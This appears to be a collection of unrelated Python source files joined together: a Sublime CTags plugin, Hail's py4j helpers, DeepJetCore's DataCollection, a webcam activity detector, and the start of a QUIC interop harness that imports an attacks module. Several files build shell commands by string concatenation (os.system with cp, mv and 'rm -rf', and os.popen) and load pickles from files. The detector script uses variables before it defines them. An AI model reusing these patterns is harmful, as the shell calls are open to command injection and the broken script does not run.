folder(s).
"""
is_enabled = check_if_building
def __init__(self, args):
sublime_plugin.TextCommand.__init__(self, args)
self.endings = re.compile(RUBY_SPECIAL_ENDINGS)
def is_visible(self):
return setting('show_context_menus')
@ctags_goto_command(jump_directly=True)
def run(self, view, args, tags_file):
region = view.sel()[0]
if region.begin() == region.end(): # point
region = view.word(region)
# handle special line endings for Ruby
language = view.settings().get('syntax')
endings = view.substr(
sublime.Region(
region.end(),
region.end() + 1))
if 'Ruby' in language and self.endings.match(endings):
region = sublime.Region(region.begin(), region.end() + 1)
symbol = view.substr(region)
sym_line = view.substr(view.line(region))
(row, col) = view.rowcol(region.begin())
line_to_symbol = sym_line[:col]
#print ("line_to_symbol %s" % line_to_symbol)
source = get_source(view)
arrMbrParts = Parser.extract_member_exp(line_to_symbol, source)
return JumpToDefinition.run(
symbol,
region,
sym_line,
arrMbrParts,
view,
tags_file)
class SearchForDefinition(sublime_plugin.WindowCommand):
"""
Provider for the ``search_for_definition`` command.
Command searches for definition for a symbol in the open file(s) or
folder(s).
"""
is_enabled = check_if_building
def is_visible(self):
return setting('show_context_menus')
def run(self):
self.window.show_input_panel(
'', '', self.on_done, self.on_change, self.on_cancel)
def on_done(self, symbol):
view = self.window.active_view()
tags_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
if not tags_file:
status_message('Can\'t find any relevant tags file')
return
result = JumpToDefinition.run(symbol, None, "", [], view, tags_file)
show_tag_panel(view, result, True)
def on_change(self, text):
pass
def on_cancel(self):
pass
# Show Symbol commands
tags_cache = defaultdict(dict)
class ShowSymbols(sublime_plugin.TextCommand):
"""
Provider for the ``show_symbols`` command.
Command shows all symbols for the open file(s) or folder(s).
"""
is_enabled = check_if_building
def is_visible(self):
return setting('show_context_menus')
@ctags_goto_command()
def run(self, view, args, tags_file):
if not tags_file:
return
multi = args.get('type') == 'multi'
lang = args.get('type') == 'lang'
if view.file_name():
files = get_rel_path_to_source(
view.file_name(), tags_file, multi)
if lang:
suffix = get_current_file_suffix(view.file_name())
key = suffix
else:
key = ','.join(files)
tags_file = tags_file + '_sorted_by_file'
base_path = get_common_ancestor_folder(
view.file_name(), view.window().folders())
def get_tags():
with TagFile(tags_file, FILENAME) as tagfile:
if lang:
return tagfile.get_tags_dict_by_suffix(
suffix, filters=compile_filters(view))
elif multi:
return tagfile.get_tags_dict(
filters=compile_filters(view))
else:
return tagfile.get_tags_dict(
*files, filters=compile_filters(view))
if key in tags_cache[base_path]:
print('loading symbols from cache')
tags = tags_cache[base_path][key]
else:
print('loading symbols from file')
tags = get_tags()
tags_cache[base_path][key] = tags
print(('loaded [%d] symbols' % len(tags)))
if not tags:
if multi:
sublime.status_message(
'No symbols found **FOR CURRENT FOLDERS**; Try Rebuild?')
else:
sublime.status_message(
'No symbols found **FOR CURRENT FILE**; Try Rebuild?')
path_cols = (0, ) if len(files) > 1 or multi else ()
formatting = functools.partial(
format_tag_for_quickopen, show_path=bool(path_cols))
@prepare_for_quickpanel(formatting)
def sorted_tags():
return sorted(
chain(*(tags[k] for k in tags)), key=iget('tag_path'))
return sorted_tags
# Rebuild CTags commands
class RebuildTags(sublime_plugin.TextCommand):
"""
Provider for the ``rebuild_tags`` command.
Command (re)builds tag files for the open file(s) or folder(s), reading
relevant settings from the settings file.
"""
def run(self, edit, **args):
"""Handler for ``rebuild_tags`` command"""
paths = []
command = setting('command')
recursive = setting('recursive')
opts = setting('opts')
tag_file = setting('tag_file')
if 'dirs' in args and args['dirs']:
paths.extend(args['dirs'])
self.build_ctags(paths, command, tag_file, recursive, opts)
elif 'files' in args and args['files']:
paths.extend(args['files'])
# build ctags and ignore recursive flag - we clearly only want
# to build them for a file
self.build_ctags(paths, command, tag_file, False, opts)
elif (self.view.file_name() is None and
len(self.view.window().folders()) <= 0):
status_message('Cannot build CTags: No file or folder open.')
return
else:
show_build_panel(self.view)
@threaded(msg='Already running CTags!')
def build_ctags(self, paths, command, tag_file, recursive, opts):
"""
Build tags for the open file or folder(s).
:param paths: paths to build ctags for
:param command: ctags command
:param tag_file: filename to use for the tag file. Defaults to ``tags``
:param recursive: specify if search should be recursive in directory
given by path. This overrides filename specified by ``path``
:param opts: list of additional parameters to pass to the ``ctags``
executable
:returns: None
"""
def tags_building(tag_file):
"""Display 'Building CTags' message in all views"""
print(('Building CTags for %s: Please be patient' % tag_file))
in_main(lambda: status_message('Building CTags for {0}: Please be'
' patient'.format(tag_file)))()
def tags_built(tag_file):
"""Display 'Finished Building CTags' message in all views"""
print(('Finished building %s' % tag_file))
in_main(lambda: status_message('Finished building {0}'
.format(tag_file)))()
in_main(lambda: tags_cache[os.path.dirname(tag_file)].clear())()
for path in paths:
tags_building(path)
try:
result = ctags.build_ctags(path=path, tag_file=tag_file,
recursive=recursive, opts=opts,
cmd=command)
except IOError as e:
error_message(e.strerror)
return
except subprocess.CalledProcessError as e:
if sublime.platform() == 'windows':
str_err = ' '.join(
e.output.decode('windows-1252').splitlines())
else:
str_err = e.output.decode(
locale.getpreferredencoding()).rstrip()
error_message(str_err)
return
except Exception as e:
error_message(
"An unknown error occured.\nCheck the console for info.")
raise e
tags_built(result)
GetAllCTagsList.ctags_list = [] # clear the cached ctags list
# Autocomplete commands
class GetAllCTagsList():
"""
Cache all the ctags list.
"""
ctags_list = []
def __init__(self, list):
self.ctags_list = list
class CTagsAutoComplete(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
if setting('autocomplete'):
prefix = prefix.strip().lower()
tags_path = view.window().folders()[0] + '/' + setting('tag_file')
sub_results = [v.extract_completions(prefix)
for v in sublime.active_window().views()]
sub_results = [(item, item) for sublist in sub_results
for item in sublist] # flatten
if GetAllCTagsList.ctags_list:
results = [sublist for sublist in GetAllCTagsList.ctags_list
if sublist[0].lower().startswith(prefix)]
results = sorted(set(results).union(set(sub_results)))
return results
else:
tags = []
# check if a project is open and the tags file exists
if not (view.window().folders() and os.path.exists(tags_path)):
return tags
if sublime.platform() == "windows":
prefix = ""
else:
prefix = "\\"
f = os.popen(
"awk \"{ print " + prefix + "$1 }\" \"" + tags_path + "\"")
for i in f.readlines():
tags.append([i.strip()])
tags = [(item, item) for sublist in tags
for item in sublist] # flatten
tags = sorted(set(tags)) # make unique
GetAllCTagsList.ctags_list = tags
results = [sublist for sublist in GetAllCTagsList.ctags_list
if sublist[0].lower().startswith(prefix)]
results = sorted(set(results).union(set(sub_results)))
return results
# Test CTags commands
class TestCtags(sublime_plugin.TextCommand):
routine = None
def run(self, edit, **args):
if self.routine is None:
self.routine = self.co_routine(self.view)
next(self.routine)
def __next__(self):
try:
next(self.routine)
except Exception as e:
print(e)
self.routine = None
def co_routine(self, view):
tag_file = find_tags_relative_to(
view.file_name(), setting('tag_file'))
with codecs.open(tag_file, encoding='utf-8') as tf:
tags = parse_tag_lines(tf, tag_class=TagElements)
print('Starting Test')
ex_failures = []
line_failures = []
for symbol, tag_list in list(tags.items()):
for tag in tag_list:
tag.root_dir = os.path.dirname(tag_file)
def hook(av):
test_context = av.sel()[0]
if tag.ex_command.isdigit():
test_string = tag.symbol
else:
test_string = tag.ex_command
test_context = av.line(test_context)
if not av.substr(test_context).startswith(test_string):
failure = 'FAILURE %s' % pprint.pformat(tag)
failure += av.file_name()
if setting('debug'):
if not sublime.question_box('%s\n\n\n' % failure):
self.routine = None
return sublime.set_clipboard(failure)
ex_failures.append(tag)
sublime.set_timeout(self.__next__, 5)
scroll_to_tag(view, tag, hook)
yield
failures = line_failures + ex_failures
tags_tested = sum(len(v) for v in list(tags.values())) - len(failures)
view = sublime.active_window().new_file()
with Edit(view) as edit:
edit.insert(view.size(), '%s Tags Tested OK\n' % tags_tested)
edit.insert(view.size(), '%s Tags Failed' % len(failures))
view.set_scratch(True)
view.set_name('CTags Test Results')
if failures:
sublime.set_clipboard(pprint.pformat(failures))
|
java.py
|
import json
import socketserver
import socket
import sys
import re
from threading import Thread
import py4j
import hail
class FatalError(Exception):
""":class:`.FatalError` is an error thrown by Hail method failures"""
class Env:
_jvm = None
_gateway = None
_hail_package = None
_jutils = None
_hc = None
_counter = 0
_seed_generator = None
@staticmethod
def get_uid():
Env._counter += 1
return "__uid_{}".format(Env._counter)
@staticmethod
def jvm():
if not Env._jvm:
Env.hc()
assert Env._jvm is not None
return Env._jvm
@staticmethod
def hail():
if not Env._hail_package:
Env._hail_package = getattr(Env.jvm(), 'is').hail
return Env._hail_package
@staticmethod
def gateway():
if not Env._gateway:
Env.hc()
assert Env._gateway is not None
return Env._gateway
@staticmethod
def jutils():
if not Env._jutils:
Env._jutils = scala_package_object(Env.hail().utils)
return Env._jutils
@staticmethod
def hc():
if not Env._hc:
from hail.context import init
import sys
sys.stderr.write("Initializing Spark and Hail with default parameters...\n")
init()
assert Env._hc is not None
return Env._hc
@staticmethod
def backend():
return Env.hc()._backend
@staticmethod
def spark_backend(op):
b = Env.backend()
if isinstance(b, hail.backend.SparkBackend):
return b
else:
raise NotImplementedError(
f"{b.__class__.__name__} doesn't support {op}, only SparkBackend")
@staticmethod
def fs():
return Env.backend().fs
@staticmethod
def spark_session():
return Env.hc()._spark_session
_dummy_table = None
@staticmethod
def dummy_table():
if Env._dummy_table is None:
import hail
Env._dummy_table = hail.utils.range_table(1, 1).key_by().cache()
return Env._dummy_table
@staticmethod
def set_seed(seed):
Env._seed_generator = hail.utils.HailSeedGenerator(seed)
@staticmethod
def next_seed():
if Env._seed_generator is None:
Env.set_seed(None)
return Env._seed_generator.next_seed()
def jarray(jtype, lst):
jarr = Env.gateway().new_array(jtype, len(lst))
for i, s in enumerate(lst):
jarr[i] = s
return jarr
def scala_object(jpackage, name):
return getattr(getattr(jpackage, name + '$'), 'MODULE$')
def scala_package_object(jpackage):
return scala_object(jpackage, 'package')
def jnone():
return scala_object(Env.jvm().scala, 'None')
def jsome(x):
return Env.jvm().scala.Some(x)
def joption(x):
return jsome(x) if x else jnone()
def from_option(x):
return x.get() if x.isDefined() else None
def jindexed_seq(x):
return Env.jutils().arrayListToISeq(x)
def jset(x):
return Env.jutils().arrayListToSet(x)
def jindexed_seq_args(x):
args = [x] if isinstance(x, str) else x
return jindexed_seq(args)
def jset_args(x):
args = [x] if isinstance(x, str) else x
return jset(args)
def jiterable_to_list(it):
if it is not None:
return list(Env.jutils().iterableToArrayList(it))
else:
return None
_parsable_str = re.compile(r'[\w_]+')
def escape_parsable(s):
if _parsable_str.fullmatch(s):
return s
else:
return '`' + s.encode('unicode_escape').decode('utf-8').replace('`', '\\`') + '`'
def unescape_parsable(s):
return bytes(s.replace('\\`', '`'), 'utf-8').decode('unicode_escape')
def jarray_to_list(a):
return list(a) if a else None
class Log4jLogger:
log_pkg = None
@staticmethod
def get():
if Log4jLogger.log_pkg is None:
Log4jLogger.log_pkg = Env.jutils()
return Log4jLogger.log_pkg
def error(msg):
Log4jLogger.get().error(msg)
def warn(msg):
Log4jLogger.get().warn(msg)
def info(msg):
Log4jLogger.get().info(msg)
def handle_java_exception(f):
def deco(*args, **kwargs):
import pyspark
try:
return f(*args, **kwargs)
except py4j.protocol.Py4JJavaError as e:
s = e.java_exception.toString()
# py4j catches NoSuchElementExceptions to stop array iteration
if s.startswith('java.util.NoSuchElementException'):
raise
tpl = Env.jutils().handleForPython(e.java_exception)
deepest, full = tpl._1(), tpl._2()
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (deepest, full, hail.__version__, deepest)) from None
except pyspark.sql.utils.CapturedException as e:
raise FatalError('%s\n\nJava stack trace:\n%s\n'
'Hail version: %s\n'
'Error summary: %s' % (e.desc, e.stackTrace, hail.__version__, e.desc)) from None
return deco
_installed = False
_original = None
def install_exception_handler():
global _installed
global _original
if not _installed:
_original = py4j.protocol.get_return_value
_installed = True
# The original `get_return_value` is not patched, it's idempotent.
patched = handle_java_exception(_original)
# only patch the one used in py4j.java_gateway (call Java API)
py4j.java_gateway.get_return_value = patched
def uninstall_exception_handler():
global _installed
global _original
if _installed:
_installed = False
py4j.protocol.get_return_value = _original
class LoggingTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
for line in self.rfile:
sys.stderr.write(line.decode("ISO-8859-1"))
class SimpleServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
Env.jutils().addSocketAppender(host, port)
|
DataCollection.py
|
'''
Created on 21 Feb 2017
@author: jkiesele
'''
from DeepJetCore.TrainData import TrainData
from DeepJetCore.dataPipeline import TrainDataGenerator
import tempfile
import pickle
import shutil
import os
import copy
import time
import logging
from DeepJetCore.stopwatch import stopwatch
logger = logging.getLogger(__name__)
class DataCollection(object):
'''
classdocs
'''
def __init__(self, infile = None, nprocs = -1):
'''
Constructor
'''
self.clear()
self.istestdata=False
self.batch_uses_sum_of_squares=False
self.gen = None
self.__batchsize=1
self.optionsdict={}
self.weighterobjects={}
self.batch_mode = False
self.nprocs=-1
self.no_copy_on_convert=True
if infile:
self.readFromFile(infile)
if not len(self.samples):
raise Exception("no valid datacollection found in "+infile)
def setDataClass(self, dataclass):
self.dataclass = dataclass
self.dataclass_instance = self.dataclass()
def clear(self):
self.samples=[]
self.sourceList=[]
self.dataDir=""
self.dataclass = TrainData
self.dataclass_instance = self.dataclass()
self.__nsamples = 0
def __iadd__(self, other):
'A += B'
if not isinstance(other, DataCollection):
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
def _extend_(a, b, name):
getattr(a, name).extend(getattr(b, name))
_extend_(self, other, 'samples')
if len(set(self.samples)) != len(self.samples):
raise ValueError('The two DataCollections being summed contain the same files!')
_extend_(self, other, 'sourceList')
if self.dataDir != other.dataDir:
raise ValueError('The two DataCollections have different data directories, still to be implemented!')
#if type(self.dataclass) != type(other.dataclass):
# raise ValueError(
# 'The two DataCollections were made with a'
# ' different data class type! (%s, and %s)' % (type(self.dataclass), type(other.dataclass))
# )
return self
def __add__(self, other):
'A+B'
if not isinstance(other, DataCollection):
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
ret = copy.deepcopy(self)
ret += other
return ret
def __radd__(self, other):
'B+A to work with sum'
if other == 0:
return copy.deepcopy(self)
elif isinstance(other, DataCollection):
return self + other #we use the __add__ method
else:
raise ValueError("I don't know how to add DataCollection and %s" % type(other))
def __len__(self):
return len(self.samples)
def _readMetaInfoIfNeeded(self):
if len(self.samples)<1:
return
if self.dataclass_instance is None:
self.dataclass_instance = self.dataclass()
if self.dataclass_instance.nElements() < 1:
self.dataclass_instance.readMetaDataFromFile(self.getSamplePath(self.samples[0]))
def _readNTotal(self):
if not len(self.samples):
return 0
gen = trainDataGenerator()
gen.setFileList([self.dataDir+"/"+s for s in self.samples])
return gen.getNTotal()
def removeLast(self):
self.samples.pop()
self.sourceList.pop()
def getNumpyFeatureShapes(self):
if len(self.samples)<1:
raise Exception("DataCollection.getNumpyFeatureShapes: no files")
return []
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureShapes()
def getNumpyFeatureDTypes(self):
if len(self.samples)<1:
raise Exception("DataCollection.getNumpyFeatureDTypes: no files")
return []
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureDTypes()
def getNumpyFeatureArrayNames(self):
if len(self.samples)<1:
raise Exception("DataCollection.getNumpyFeatureNames: no files")
return []
self._readMetaInfoIfNeeded()
return self.dataclass_instance.getNumpyFeatureArrayNames()
def getKerasFeatureDTypes(self):
print('DataCollection.getKerasFeatureDTypes: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureDTypes()
def getKerasFeatureShapes(self):
print('DataCollection.getKerasFeatureShapes: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureShapes()
def getKerasFeatureArrayNames(self):
print('DataCollection.getKerasFeatureArrayNames: deprecation warning, use getNumpyFeatureArrayNames')
return self.getNumpyFeatureArrayNames()
def getInputShapes(self):
print('DataCollection:getInputShapes deprecated, use getNumpyFeatureShapes ')
return self.getNumpyFeatureShapes()
def setBatchSize(self,bsize):
self.__batchsize=bsize
def getBatchSize(self):
return self.__batchsize
def validate(self, remove=True, skip_first=0):
'''
checks if all samples in the collection can be read properly.
removes the invalid samples from the sample list.
Also removes the original link to the root file, so recover cannot be run
(this might be changed in future implementations)
'''
validsourcelist = len(self.samples) == len(self.sourceList)
newsamples=[]
newsources=[]
for i in range(len(self.samples)):
if i < skip_first: continue
td = self.dataclass ()
fullpath=self.getSamplePath(self.samples[i])
print('reading '+fullpath, str(i), '/', str(len(self.samples)))
try:
td.readFromFile(fullpath)
if hasattr(td, "isValid"):
if not td.isValid():
raise Exception("data validation failed for "+fullpath)
if td.nElements() < 1:
print("warning, no data in file "+fullpath)
del td
newsamples.append(self.samples[i])
if validsourcelist:
newsources.append(self.sourceList[i])
continue
except Exception as e:
print('problem with file, removing ', fullpath)
self.samples = newsamples
self.newsources = newsources
def removeEntry(self,relative_path_to_entry):
for i in range(len(self.samples)):
if relative_path_to_entry==self.samples[i]:
print('removing '+self.samples[i])
del self.samples[i]
del self.sourceList[i]
break
def writeToFile(self,filename):
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as fd:
pickle.dump(self.samples, fd,protocol=0 )
pickle.dump(self.sourceList, fd,protocol=0 )
pickle.dump(self.dataclass, fd,protocol=0 )
pickle.dump(self.weighterobjects, fd, protocol=0)
pickle.dump(self.__batchsize, fd, protocol=0)
pickle.dump(self.batch_uses_sum_of_squares, fd, protocol=0)
pickle.dump(self.optionsdict, fd, protocol=0)
shutil.move(fd.name, filename)
os.chmod(filename, 0o644)
def readFromFile(self,filename):
fd=open(filename,'rb')
self.samples=pickle.load(fd)
self.sourceList=pickle.load(fd)
try:
self.dataclass=pickle.load(fd)
self.weighterobjects=pickle.load(fd)
self.__batchsize = pickle.load(fd)
self.batch_uses_sum_of_squares = pickle.load(fd)
self.optionsdict = pickle.load(fd)
except Exception as e:
print(e)
print("WARNING: wrong dataCollection format. Can still be used for training, but it is advised to recreate it: this is possible without converting the original data again using the script createDataCollectionFromTD.py (takes a few seconds)\nBookkeeping (e.g. for predict) will be broken unless data collection is updated to new format.")
finally:
fd.close()
self.dataDir=os.path.dirname(os.path.abspath(filename))
self.dataDir+='/'
def readSourceListFromFile(self, file, relpath='', checkfiles=False):
self.samples=[]
self.sourceList=[]
self.__nsamples=0
self.dataDir=""
td=self.dataclass()
fdir=os.path.dirname(file)
fdir=os.path.abspath(fdir)
fdir=os.path.realpath(fdir)
lines = [(line.rstrip('\n')).rstrip(' ') for line in open(file)]
for line in lines:
if len(line) < 1: continue
if relpath:
self.sourceList.append(os.path.join(relpath, line))
else:
self.sourceList.append(line)
if len(self.sourceList)<1:
raise Exception('source samples list empty')
if checkfiles:
print('DataCollection: checking files')
self.sourceList=self.checkSourceFiles()
def checkSourceFiles(self):
td=self.dataclass()
newsamples=[]
for s in self.sourceList:
logger.info('checking '+self.getSamplePath(s))
if td.fileIsValid(self.getSamplePath(s)):
newsamples.append(s)
else:
print('source file '+s+' seems to be broken, will skip processing it')
return newsamples
def split(self,ratio):
'''
out fraction is (1-ratio)
returns out
modifies self
'''
nin = int(len(self.samples)*(ratio))
if nin < 1:
raise ValueError("DataCollection:split: less than one sample would remain")
if nin == len(self.samples):
raise ValueError("DataCollection:split: less than one sample would be assigned to output")
out=DataCollection()
out.dataDir = self.dataDir
out.dataclass = self.dataclass #anyway just a dummy
out.samples = self.samples[nin:]
self.samples = self.samples[:nin]
if len(self.sourceList) == len(self.samples):
out.sourceList = self.sourceList[nin:]
self.sourceList = self.sourceList[:nin]
else:
self.sourceList = []
out.sourceList = []
#force re-read upon request
self.__nsamples = 0
out.__nsamples = 0
out.weighterobjects = copy.deepcopy(self.weighterobjects)
return out
def recoverCreateDataFromRootFromSnapshot(self, snapshotfile):
snapshotfile=os.path.abspath(snapshotfile)
self.readFromFile(snapshotfile)
if len(self.sourceList) < 1:
return
outputDir=os.path.dirname(snapshotfile)+'/'
self.dataDir=outputDir
finishedsamples=len(self.samples)
self.__writeData_async_andCollect(finishedsamples,outputDir)
self.writeToFile(outputDir+'/dataCollection.djcdc')
def getAllLabels(self,nfiles=-1):
return self.extract_features(self.dataclass,'y',nfiles)
def getAllFeatures(self,nfiles=-1):
return self.extract_features(self.dataclass,'x',nfiles)
def getAllWeights(self,nfiles=-1):
return self.extract_features(self.dataclass,'w',nfiles)
def createDataFromRoot(
self, dataclass, outputDir,
redo_meansandweights=True, means_only=False, dir_check=True
):
'''
Also creates a file list of the output files
After the operation, the object will point to the already processed
files (not root files)
Writes out a snapshot of itself after every successfully written output file
to recover the data until a possible error occurred
'''
if len(self.sourceList) < 1:
print('createDataFromRoot: no input root file')
raise Exception('createDataFromRoot: no input root file')
outputDir+='/'
if os.path.isdir(outputDir) and dir_check:
raise Exception('output dir must not exist')
elif not os.path.isdir(outputDir):
os.mkdir(outputDir)
self.dataDir=outputDir
self.samples=[]
self.dataclass=dataclass
td=self.dataclass()
self.weighterobjects = td.createWeighterObjects(self.sourceList)
if self.batch_mode:
for sample in self.sourceList:
self.__writeData(sample, outputDir)
else:
self.__writeData_async_andCollect(0, outputDir)
def __writeData(self, sample, outputDir):
sw=stopwatch()
td=self.dataclass()
fileTimeOut(sample,120) #once available copy to ram
sbasename = os.path.basename(sample)
newname = sbasename[:sbasename.rfind('.')]+'.djctd'
newpath=os.path.abspath(outputDir+newname)
td.writeFromSourceFile(sample, self.weighterobjects, istraining=not self.istestdata, outname=newpath)
print('converted and written '+newname+' in ',sw.getAndReset(),' sec')
self.samples.append(newname)
td.clear()
if not self.batch_mode:
self.writeToFile(outputDir+'/snapshot.djcdc')
def __writeData_async_andCollect(self, startindex, outputDir):
from multiprocessing import Process, Queue, cpu_count, Lock
wo_queue = Queue()
writelock=Lock()
thispid=str(os.getpid())
if not self.batch_mode and not os.path.isfile(outputDir+'/snapshot.djcdc'):
self.writeToFile(outputDir+'/snapshot.djcdc')
tempstoragepath='/dev/shm/'+thispid
logger.info('creating dir '+tempstoragepath)
os.system('mkdir -p '+tempstoragepath)
def writeData_async(index,woq,wrlck):
logger.info('async started')
sw=stopwatch()
td=self.dataclass()
sample=self.sourceList[index]
if self.batch_mode or self.no_copy_on_convert:
tmpinput = sample
def removefile():
pass
else:
tmpinput = tempstoragepath+'/'+str(os.getpid())+'_tmp_'+os.path.basename(sample)
def removefile():
os.system('rm -f '+tmpinput)
import atexit
atexit.register(removefile)
logger.info('start cp')
os_ret=os.system('cp '+sample+' '+tmpinput)
if os_ret:
raise Exception("copy to ramdisk not successful for "+sample)
success=False
out_samplename=''
out_sampleentries=0
sbasename = os.path.basename(sample)
newname = sbasename[:sbasename.rfind('.')]+'.djctd'
newpath=os.path.abspath(outputDir+newname)
try:
logger.info('convertFromSourceFile')
td.writeFromSourceFile(tmpinput, self.weighterobjects, istraining = not self.istestdata, outname=newpath)
print('converted and written '+newname+' in ',sw.getAndReset(),' sec -', index)
out_samplename=newname
out_sampleentries=1
success=True
td.clear()
removefile()
woq.put((index,[success,out_samplename,out_sampleentries]))
except:
print('problem in '+newname)
removefile()
woq.put((index,[False,out_samplename,out_sampleentries]))
raise
def __collectWriteInfo(successful,samplename,sampleentries,outputDir):
if not successful:
raise Exception("write not successful, stopping")
self.samples.append(samplename)
if not self.batch_mode:
self.writeToFile(outputDir+'/snapshot_tmp.djcdc')#avoid to overwrite directly
os.system('mv '+outputDir+'/snapshot_tmp.djcdc '+outputDir+'/snapshot.djcdc')
processes=[]
processrunning=[]
processfinished=[]
for i in range(startindex,len(self.sourceList)):
processes.append(Process(target=writeData_async, args=(i,wo_queue,writelock) ) )
processrunning.append(False)
processfinished.append(False)
nchilds = int(cpu_count()/2)-2 if self.nprocs <= 0 else self.nprocs
#if 'nvidiagtx1080' in os.getenv('HOSTNAME'):
# nchilds=cpu_count()-5
if nchilds<1:
nchilds=1
#nchilds=10
lastindex=startindex-1
alldone=False
results=[]
try:
while not alldone:
nrunning=0
for runs in processrunning:
if runs: nrunning+=1
for i in range(len(processes)):
if nrunning>=nchilds:
break
if processrunning[i]:continue
if processfinished[i]:continue
time.sleep(0.1)
logging.info('starting %s...' % self.sourceList[startindex+i])
processes[i].start()
processrunning[i]=True
nrunning+=1
if not wo_queue.empty():
res=wo_queue.get()
results.append(res)
originrootindex=res[0]
logging.info('finished %s...' % self.sourceList[originrootindex])
processfinished[originrootindex-startindex]=True
processes [originrootindex-startindex].join(5)
processrunning [originrootindex-startindex]=False
#immediately send the next
continue
results = sorted(results, key=lambda x:x[0])
for r in results:
thisidx=r[0]
if thisidx==lastindex+1:
logging.info('>>>> collected result %d of %d' % (thisidx+1,len(self.sourceList)))
__collectWriteInfo(r[1][0],r[1][1],r[1][2],outputDir)
lastindex=thisidx
if nrunning==0:
alldone=True
continue
time.sleep(0.1)
except:
os.system('rm -rf '+tempstoragepath)
raise
os.system('rm -rf '+tempstoragepath)
def convertListOfRootFiles(self, inputfile, dataclass, outputDir,
takeweightersfrom='', means_only=False,
output_name='dataCollection.djcdc',
relpath='', checkfiles=False):
newmeans=True
if takeweightersfrom:
self.readFromFile(takeweightersfrom)
newmeans=False
self.dataclass = dataclass
self.readSourceListFromFile(inputfile, relpath=relpath,checkfiles=checkfiles)
self.createDataFromRoot(
dataclass, outputDir,
newmeans, means_only = means_only,
dir_check= not self.batch_mode
)
self.writeToFile(outputDir+'/'+output_name)
def getSamplePath(self,samplefile):
#for backward compatibility
if samplefile[0] == '/':
return samplefile
return self.dataDir+'/'+samplefile
def extract_features(self, dataclass, selector,nfiles):
import numpy as np
td=self.dataclass()
firstcall=True
count = 0
for sample in self.samples:
count+=1;
td.readFromFile(self.getSamplePath(sample))
#make this generic
thislist=[]
if selector == 'x':
thislist=td.transferFeatureListToNumpy(False)
if selector == 'y':
thislist=td.transferTruthListToNumpy(False)
if selector == 'w':
thislist=td.transferWeightListToNumpy(False)
if firstcall:
out=thislist
firstcall=False
else:
for i in range(0,len(thislist)):
if len(thislist[i].shape) > 1:
out[i] = np.vstack( (out[i], thislist[i] ) )
else:
out[i] = np.append(out[i],thislist[i])
if nfiles > 0:
if count > nfiles:
break
return out
def __stackData(self, dataclass, selector):
td=self.dataclass()
out=[]
firstcall=True
for sample in self.samples:
td2 = self.dataclass()
td2.readFromFile(self.getSamplePath(sample))
td.append(td2)
return td
def invokeGenerator(self):
generator = TrainDataGenerator()
generator.setBatchSize(self.__batchsize)
generator.setSquaredElementsLimit(self.batch_uses_sum_of_squares)
generator.setFileList([self.dataDir+ "/" + s for s in self.samples])
return generator
|
test.py
|
from tensorflow import keras
import numpy as np
import cv2, requests
from threading import Thread
from config import *
def notify():
# Token to be inserted here
token = None
# token = "32e07-df8-47b-800-e1ab85df7"
data = {"token": token}
url = "http://localhost:8000/notify/"
# url = "https://trial-ku.herokuapp.com/notify/"
with open(FILE_PATH, 'rb') as f:
response = requests.post(url, data = data, files={'video': f})
print(response.json())
model = keras.models.load_model('./Models/BaseModel.h5')
sent = False
# Live Generator
fc = 0
predictions = []
sus_count = 0
rec = False
cycler = REC_FRAME
vid = cv2.VideoCapture(url)
while (cv2.waitKey(1) == -1):
ret, frame = vid.read()
if not ret:
break
if fc % 2 == 0:
tmp = cv2.resize(frame, SIZE)
tmp = tmp / 255.0
pred = model.predict(np.array([tmp]))
final = pred[0][0]
predictions.append(final)
if fc > F_AVG:
for i in range(fc-F_AVG, fc):
final += predictions[i]
final /= F_AVG
else:
final = predictions[-1]
predictions.append(final)
if fc <= NOTIFY_THRESH:
sus_count += final
else:
sus_count = sus_count - predictions[fc-NOTIFY_THRESH] + final
if sus_count/fc > THRESH:
if not sent:
sent = True
rec = True
if rec:
if out is None:
out = cv2.VideoWriter(FILE_PATH, fourcc, 24, OUTPUT)
if cycler > 0:
ffff = cv2.resize(frame, OUTPUT)
out.write(ffff)
cycler -= 1
else:
cycler = REC_FRAME
rec = False
out.release()
# t1 = Thread(target=notify)
# t1.start()
if final > THRESH:
string = "Suspicious "
else:
string = "Peaceful "
# Showing Frames
string += str(final)
color = (0, 0, 255) if final > THRESH else (255, 0, 0)
frame = cv2.putText(frame, string, org, font, fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow("Video", frame)
fc += 1
vid.release()
cv2.destroyAllWindows()
|
interop.py
|
import json
import logging
import os
import random
import re
import shutil
import statistics
import string
import subprocess
import sys
import tempfile
from datetime import datetime
from typing import Callable, List, Tuple
import prettytable
from termcolor import colored
import testcases
from result import TestResult
from testcases import Perspective
import attacks
from attacks import AttackTarget
import time
import threading
def random_string(length: int):
""" Generate a random string of fixed length """
letters = string.ascii_lowercase
return "".join(random.choice(letters) for i in range(length))
def log_resources(name: string, target: string, log_dir: tempfile.TemporaryDirectory):
cmd = f"docker stats {target} --no-stream --format \"{{{{.CPUPerc}}}}\" >> {log_dir.name}/{name}.log"
while True:
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
class MeasurementResult:
